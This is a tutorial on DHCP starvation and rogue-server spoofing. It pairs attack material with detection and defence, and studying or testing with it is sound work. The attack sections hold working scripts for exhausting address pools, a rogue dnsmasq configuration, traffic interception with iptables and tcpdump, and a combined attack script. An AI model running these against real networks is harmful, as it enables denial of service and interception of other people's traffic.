DHCP Starvation and Spoofing Attacks: How to Exploit and Secure Dynamic Host Configuration Protocol
DHCP attacks represent some of the most effective yet underestimated network vulnerabilities in modern cybersecurity. By targeting the Dynamic Host Configuration Protocol that automatically assigns IP addresses to network devices, attackers can intercept traffic, redirect communications, and gain unauthorized network access. This comprehensive guide will walk you through understanding, executing, and defending against DHCP starvation and spoofing attacks.
The Dynamic Host Configuration Protocol (DHCP) is the backbone of modern network connectivity, automatically assigning IP addresses, subnet masks, gateways, and DNS servers to devices joining a network. However, this convenience comes with inherent security risks that cybersecurity professionals must understand to protect their infrastructure effectively.
Understanding DHCP Fundamentals and Attack Vectors
Before diving into attack methodologies, it's crucial to understand how DHCP operates. When a device connects to a network, it broadcasts a DHCP Discover message. The DHCP server responds with a DHCP Offer, containing available IP configuration. The client then sends a DHCP Request, and finally, the server confirms with a DHCP Acknowledge.
This four-step handshake (often called DORA) creates two primary attack opportunities, which can also be chained:
- DHCP Starvation: Exhausting the DHCP server's IP address pool by requesting all available addresses
- DHCP Spoofing: Setting up a rogue DHCP server to provide malicious network configurations
- Combined Attacks: Using starvation to disable legitimate DHCP services, then deploying a spoofed server
These attacks are particularly dangerous because they work inside the local broadcast domain, affecting every device that tries to join the segment, and can be executed with minimal technical requirements.
Executing DHCP Starvation Attacks
DHCP starvation attacks work by overwhelming the DHCP server with requests using fabricated MAC addresses, consuming all available IP addresses in the pool. Once the pool is exhausted, legitimate clients cannot obtain network configurations.
Prerequisites and Tools
For educational and authorized testing purposes, you'll need:
- A Linux-based system (Kali Linux recommended)
- Network access to the target DHCP server
- Administrative privileges on your testing machine
- Tools like yersinia, dhcpstarv, or scapy
Method 1: Using Yersinia
Yersinia is a powerful network attack framework that includes DHCP attack capabilities. Install and execute a starvation attack:
sudo apt update && sudo apt install yersinia
# Launch yersinia in interactive mode
sudo yersinia -I
# Select DHCP protocol (press 'd')
# Choose 'sending discover packet' (press '1')
# Set the attack to run continuously
Method 2: Using DHCPStarv
DHCPStarv is a specialized tool designed specifically for DHCP starvation attacks:
# Download and compile dhcpstarv
wget http://www.netpatch.ru/dhcpstarv.c
gcc dhcpstarv.c -o dhcpstarv
# Execute the attack
sudo ./dhcpstarv -i eth0
Method 3: Custom Scapy Script
For more control and learning purposes, create a custom Python script using Scapy:
#!/usr/bin/env python3
from scapy.all import *
import random

def dhcp_starvation(interface):
    for i in range(254):
        # Generate random MAC address
        mac = "02:00:00:%02x:%02x:%02x" % (
            random.randint(0, 255),
            random.randint(0, 255),
            random.randint(0, 255)
        )
        # Create DHCP discover packet
        discover = Ether(dst="ff:ff:ff:ff:ff:ff", src=mac) / \
            IP(src="0.0.0.0", dst="255.255.255.255") / \
            UDP(sport=68, dport=67) / \
            BOOTP(chaddr=mac) / \
            DHCP(options=[("message-type", "discover"), "end"])
        sendp(discover, iface=interface, verbose=0)
        print(f"Sent DHCP discover with MAC: {mac}")

# Execute the attack
dhcp_starvation("eth0")
DHCP Spoofing Attacks and Rogue Server Deployment
DHCP spoofing involves creating a malicious DHCP server that responds to client requests faster than the legitimate server, providing attacker-controlled network configurations. This enables man-in-the-middle attacks, traffic redirection, and credential harvesting.
Setting Up a Rogue DHCP Server
Using dnsmasq, you can quickly deploy a rogue DHCP server:
# Install dnsmasq
sudo apt install dnsmasq
# Create configuration file
sudo nano /etc/dnsmasq.conf
# Add these configurations (dnsmasq only accepts comments on their own lines):
interface=eth0
dhcp-range=192.168.1.100,192.168.1.200,12h
# Gateway (your machine)
dhcp-option=3,192.168.1.1
# DNS server
dhcp-option=6,8.8.8.8
dhcp-authoritative
# Start the rogue server
sudo systemctl start dnsmasq
Advanced Spoofing with Traffic Interception
To maximize the attack's effectiveness, enable IP forwarding and set up traffic capturing:
# Enable IP forwarding
echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward
# Set up iptables rules for traffic capture
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
sudo iptables -A FORWARD -i eth0 -o eth1 -j ACCEPT
sudo iptables -A FORWARD -i eth1 -o eth0 -m state --state ESTABLISHED,RELATED -j ACCEPT
# Monitor intercepted traffic
sudo tcpdump -i eth0 -w captured_traffic.pcap
Combining Starvation and Spoofing
The most effective approach combines both techniques. First, execute a starvation attack to disable the legitimate DHCP server, then immediately deploy your rogue server:
#!/bin/bash
echo "Starting DHCP starvation attack..."
sudo ./dhcpstarv -i eth0 &
STARV_PID=$!
sleep 30 # Allow time for starvation
echo "Starting rogue DHCP server..."
sudo systemctl start dnsmasq
echo "Attack initiated. Monitor with: sudo tcpdump -i eth0"
echo "Stop starvation with: kill $STARV_PID"
Detection and Monitoring Techniques
Recognizing DHCP attacks requires continuous monitoring and understanding of normal network behavior. Several indicators can reveal ongoing attacks:
Network Monitoring Commands
Monitor DHCP traffic patterns using various tools:
# Monitor DHCP packets specifically
sudo tcpdump -i eth0 port 67 or port 68
# Count active leases (rapid growth toward the pool size suggests starvation)
sudo grep -c "binding state active" /var/lib/dhcp/dhcpd.leases
# Monitor network traffic for multiple DHCP servers
sudo nmap --script broadcast-dhcp-discover
Log Analysis
Examine system logs for DHCP-related anomalies:
# Check DHCP server logs
sudo grep -i dhcp /var/log/syslog
# Look for rapid lease exhaustion
sudo journalctl -u isc-dhcp-server | grep -i "no free leases"
# Monitor for duplicate DHCP offers
sudo tcpdump -i eth0 -v -c 100 port 67 | grep -c "DHCP-Message.*Offer"  # -v is required to print DHCP options
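The handshake described at the start of the article and the indicators listed in this section can both be checked programmatically. The following is an added example, not code from the original article: it decodes raw DHCP payloads (the UDP data behind "port 67 or port 68") with a small pure-Python parser and applies two detection rules, an Offer/ACK/NAK whose server identifier (option 54) is not on the allowlist, and a burst of Discovers from many distinct client hardware addresses inside one time window. The sample traffic is constructed inline; the legitimate server address 10.1.10.1, the rogue address 10.1.10.77 and the thresholds are assumptions for the demonstration.

```python
#!/usr/bin/env python3
"""Parse DHCP payloads and flag rogue-server and starvation signatures.
Added example: sample messages are constructed, not captured traffic."""
import struct

MAGIC_COOKIE = b"\x63\x82\x53\x63"   # marks the start of the DHCP option list
MSG_TYPES = {1: "DISCOVER", 2: "OFFER", 3: "REQUEST", 5: "ACK", 6: "NAK"}


def parse_dhcp(payload: bytes) -> dict:
    """Decode the fixed BOOTP header plus the TLV option list of one message."""
    if len(payload) < 240 or payload[236:240] != MAGIC_COOKIE:
        raise ValueError("not a DHCP message")
    op, htype, hlen, hops, xid = struct.unpack("!BBBBI", payload[:8])
    yiaddr = payload[16:20]
    chaddr = payload[28:28 + min(hlen, 16)]      # never read past the 16-byte field
    options, i = {}, 240
    while i < len(payload):
        code = payload[i]
        if code == 255:                          # end-of-options marker
            break
        if code == 0:                            # pad byte carries no length
            i += 1
            continue
        length = payload[i + 1]
        options[code] = payload[i + 2:i + 2 + length]
        i += 2 + length
    msg_type = options[53][0] if options.get(53) else 0   # option 53: message type
    server_id = options.get(54)                           # option 54: server identifier
    return {
        "op": op, "xid": xid,
        "chaddr": ":".join(f"{b:02x}" for b in chaddr),
        "yiaddr": ".".join(map(str, yiaddr)),
        "type": MSG_TYPES.get(msg_type, str(msg_type)),
        "server_id": ".".join(map(str, server_id)) if server_id else None,
    }


def detect(messages, known_servers, window=60, starvation_threshold=50):
    """messages: iterable of (timestamp, raw DHCP payload). Returns alert strings."""
    alerts, discovers = [], {}            # discovers: window bucket -> set of client MACs
    for ts, payload in messages:
        try:
            m = parse_dhcp(payload)
        except ValueError:
            continue                        # ignore malformed or non-DHCP payloads
        if m["type"] in ("OFFER", "ACK", "NAK") and m["server_id"] not in known_servers:
            alerts.append(f"rogue DHCP server {m['server_id']} sent {m['type']} "
                          f"for {m['chaddr']} (xid {m['xid']:#x})")
        elif m["type"] == "DISCOVER":
            discovers.setdefault(int(ts // window), set()).add(m["chaddr"])
    for bucket, macs in sorted(discovers.items()):
        if len(macs) > starvation_threshold:
            alerts.append(f"possible starvation: {len(macs)} distinct client MACs sent "
                          f"DISCOVER in the {window}s window starting at t={bucket * window}s")
    return alerts


def build_dhcp(op, xid, chaddr, msg_type, server_id=None):
    """Assemble a minimal DHCP payload (constructed test input)."""
    hdr = struct.pack("!BBBBIHH", op, 1, 6, 0, xid, 0, 0)
    hdr += b"\x00" * 16                        # ciaddr, yiaddr, siaddr, giaddr
    hdr += chaddr.ljust(16, b"\x00")           # chaddr field is 16 bytes
    hdr += b"\x00" * 192                       # sname (64) + file (128)
    opts = bytes([53, 1, msg_type])
    if server_id:
        opts += bytes([54, 4]) + bytes(int(x) for x in server_id.split("."))
    return hdr + MAGIC_COOKIE + opts + b"\xff"


def sample_traffic():
    """Constructed capture: a normal lease, one rogue Offer, and a Discover burst."""
    legit, rogue = "10.1.10.1", "10.1.10.77"     # assumed addresses
    client = bytes.fromhex("aabbccddeeff")
    msgs = [
        (0.0, build_dhcp(1, 0x1111, client, 1)),          # DISCOVER
        (0.1, build_dhcp(2, 0x1111, client, 2, legit)),   # OFFER from the real server
        (0.2, build_dhcp(2, 0x1111, client, 2, rogue)),   # OFFER from a rogue server
        (0.3, build_dhcp(1, 0x1111, client, 3)),          # REQUEST
        (0.4, build_dhcp(2, 0x1111, client, 5, legit)),   # ACK
    ]
    for n in range(60):                                   # 60 Discovers, 60 different MACs
        mac = bytes([0x02, 0, 0, 0, 0, n])
        msgs.append((10.0 + n * 0.05, build_dhcp(1, 0x2000 + n, mac, 1)))
    return msgs


def run_detection():
    return detect(sample_traffic(), known_servers={"10.1.10.1"})


if __name__ == "__main__":
    for alert in run_detection():
        print(alert)
```

On a live network the same two rules run over payloads pulled from a pcap of "port 67 or port 68"; the server allowlist is the one thing that must be maintained by hand, and the starvation threshold should sit well above the number of clients that normally boot within one window.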
Comprehensive Defense Strategies
Protecting against DHCP attacks requires a multi-layered approach combining network configuration, monitoring, and access controls.
DHCP Snooping Implementation
DHCP snooping is the most effective defense mechanism: the switch marks the ports that lead to the legitimate DHCP server as trusted and drops DHCP server messages (Offer, ACK, NAK) arriving on any untrusted port, so a rogue server plugged into an access port never reaches clients. The switch also builds a binding table of IP, MAC and port from the exchanges it sees, and untrusted ports can be rate-limited (ip dhcp snooping limit rate) so that a starvation burst shuts down the offending port instead of draining the pool:
# Cisco switch DHCP snooping configuration (trust only the uplink toward the legitimate DHCP server)
Switch(config)# ip dhcp snooping
Switch(config)# ip dhcp snooping vlan 1-100
Switch(config)# interface gigabitethernet0/1
Switch(config-if)# ip dhcp snooping trust
Switch(config-if)# exit
Switch(config)# ip dhcp snooping database flash:dhcp_snooping.db
Port Security Configuration
Implement port security to cap the number of MAC addresses a port may learn, which limits starvation tools that cycle through spoofed source MACs. Because port security counts only Ethernet source addresses, pair it with DHCP snooping, whose MAC-address verification drops client messages whose chaddr field does not match the frame's source MAC:
# Configure port security on access ports
Switch(config)# interface range gigabitethernet0/2-24
Switch(config-if-range)# switchport mode access
Switch(config-if-range)# switchport port-security
Switch(config-if-range)# switchport port-security maximum 3
Switch(config-if-range)# switchport port-security violation shutdown
Switch(config-if-range)# switchport port-security mac-address sticky
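To make the interaction of the two switch-side controls above concrete, the following added example (not code from the original article or from any switch vendor) models them in Python: DHCP snooping forwards server messages only from trusted ports, verifies that a client's chaddr matches the Ethernet source, rate-limits client DHCP packets per port, and records bindings from ACKs; port security caps learned source MACs per access port at the article's value of 3 and shuts the port on violation. The per-port rate limit of 15 packets per second, the port names and all traffic are assumptions constructed for the demonstration.

```python
#!/usr/bin/env python3
"""Software model of DHCP snooping plus port security on an access switch.
Added example with constructed traffic; values other than 'maximum 3' are assumed."""
from dataclasses import dataclass, field

SERVER_MSGS = {"OFFER", "ACK", "NAK"}


@dataclass
class Frame:
    port: str            # switch port the frame arrived on
    src_mac: str         # Ethernet source address
    msg_type: str        # DISCOVER / OFFER / REQUEST / ACK / NAK
    chaddr: str = ""     # client hardware address inside the DHCP payload
    yiaddr: str = ""     # address assigned by the server (ACK only)
    ts: float = 0.0      # arrival time in seconds


@dataclass
class SwitchModel:
    trusted_ports: set
    max_macs_per_port: int = 3      # "switchport port-security maximum 3"
    client_pps_limit: int = 15      # assumed per-port DHCP rate limit (packets/second)
    learned: dict = field(default_factory=dict)    # port -> set of learned source MACs
    bindings: dict = field(default_factory=dict)   # yiaddr -> client MAC (snooping table)
    rate: dict = field(default_factory=dict)       # port -> [second, packets in that second]
    errdisabled: set = field(default_factory=set)

    def handle(self, f: Frame) -> str:
        """Return 'forward' or 'drop: <reason>' and update the switch state."""
        if f.port in self.errdisabled:
            return "drop: port is err-disabled"
        if f.port in self.trusted_ports:
            if f.msg_type == "ACK" and f.yiaddr:
                self.bindings[f.yiaddr] = f.chaddr          # learn the binding from the ACK
            return "forward"
        # untrusted access port from here on
        macs = self.learned.setdefault(f.port, set())
        if f.src_mac not in macs:
            if len(macs) >= self.max_macs_per_port:
                self.errdisabled.add(f.port)                 # violation mode "shutdown"
                return "drop: port-security violation, port shut down"
            macs.add(f.src_mac)
        if f.msg_type in SERVER_MSGS:
            return "drop: DHCP server message on untrusted port"
        if f.chaddr and f.chaddr != f.src_mac:
            return "drop: chaddr does not match Ethernet source"
        sec, count = self.rate.get(f.port, [None, 0])
        second = int(f.ts)
        count = count + 1 if sec == second else 1
        self.rate[f.port] = [second, count]
        if count > self.client_pps_limit:
            self.errdisabled.add(f.port)                     # snooping rate limit exceeded
            return "drop: DHCP rate limit exceeded, port shut down"
        return "forward"


def run_scenario():
    """Constructed traffic: normal lease, rogue Offer, spoofed chaddr, MAC-cycling
    burst, and a single-MAC Discover flood. Returns (switch, verdict list)."""
    sw = SwitchModel(trusted_ports={"Gi0/1"})
    client, server = "aa:bb:cc:dd:ee:ff", "00:11:22:33:44:55"
    v = []
    # legitimate exchange: client on Gi0/2, real server behind the trusted uplink Gi0/1
    v.append(sw.handle(Frame("Gi0/2", client, "DISCOVER", client, ts=1.0)))
    v.append(sw.handle(Frame("Gi0/1", server, "OFFER", client, "10.1.10.50", 1.1)))
    v.append(sw.handle(Frame("Gi0/2", client, "REQUEST", client, ts=1.2)))
    v.append(sw.handle(Frame("Gi0/1", server, "ACK", client, "10.1.10.50", 1.3)))
    # a rogue server answering from an access port
    v.append(sw.handle(Frame("Gi0/3", "02:00:00:00:00:99", "OFFER", client, "10.1.10.200", 1.05)))
    # a client whose DHCP chaddr differs from its Ethernet source
    v.append(sw.handle(Frame("Gi0/5", "02:00:00:00:00:01", "DISCOVER", "02:00:00:00:00:77", ts=2.0)))
    # five Discovers from five different source MACs on one port
    for n in range(5):
        mac = f"02:00:00:00:01:{n:02x}"
        v.append(sw.handle(Frame("Gi0/4", mac, "DISCOVER", mac, ts=5.0 + n * 0.01)))
    # twenty Discovers from a single MAC inside one second
    flood = "02:00:00:00:02:00"
    for n in range(20):
        v.append(sw.handle(Frame("Gi0/6", flood, "DISCOVER", flood, ts=8.0 + n * 0.01)))
    return sw, v


if __name__ == "__main__":
    sw, verdicts = run_scenario()
    for i, verdict in enumerate(verdicts):
        print(i, verdict)
    print("bindings:", sw.bindings, "err-disabled:", sorted(sw.errdisabled))
```

Note which control catches which case: the rogue Offer and the mismatched chaddr are stopped by snooping, the MAC-cycling burst by port security after the third address, and the single-MAC flood, which port security never sees as a violation, only by the snooping rate limit.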
Network Segmentation and VLANs
Proper network segmentation limits attack scope:
# Create separate VLANs for different device types
Switch(config)# vlan 10
Switch(config-vlan)# name SERVERS
Switch(config-vlan)# vlan 20
Switch(config-vlan)# name WORKSTATIONS
Switch(config-vlan)# vlan 30
Switch(config-vlan)# name GUESTS
# Configure DHCP pools per VLAN
Router(config)# ip dhcp pool SERVERS
Router(dhcp-config)# network 10.1.10.0 255.255.255.0
Router(dhcp-config)# default-router 10.1.10.1
Monitoring and Alerting Systems
Implement automated monitoring to detect attacks in real-time:
#!/bin/bash
# DHCP monitoring script
LEASE_FILE="/var/lib/dhcp/dhcpd.leases"
THRESHOLD=90 # Alert when 90% of leases are used
TOTAL_POOL=200
CHECK_INTERVAL=60 # Seconds between checks
while true; do
    # dhcpd appends to this file between rewrites, so the count can slightly overstate usage
    ACTIVE_LEASES=$(grep -c "binding state active" "$LEASE_FILE")
    USAGE_PERCENT=$((ACTIVE_LEASES * 100 / TOTAL_POOL))
    if [ "$USAGE_PERCENT" -gt "$THRESHOLD" ]; then
        echo "ALERT: DHCP pool usage at ${USAGE_PERCENT}%" | \
            mail -s "DHCP Pool Warning" admin@company.com
    fi
    sleep "$CHECK_INTERVAL"
done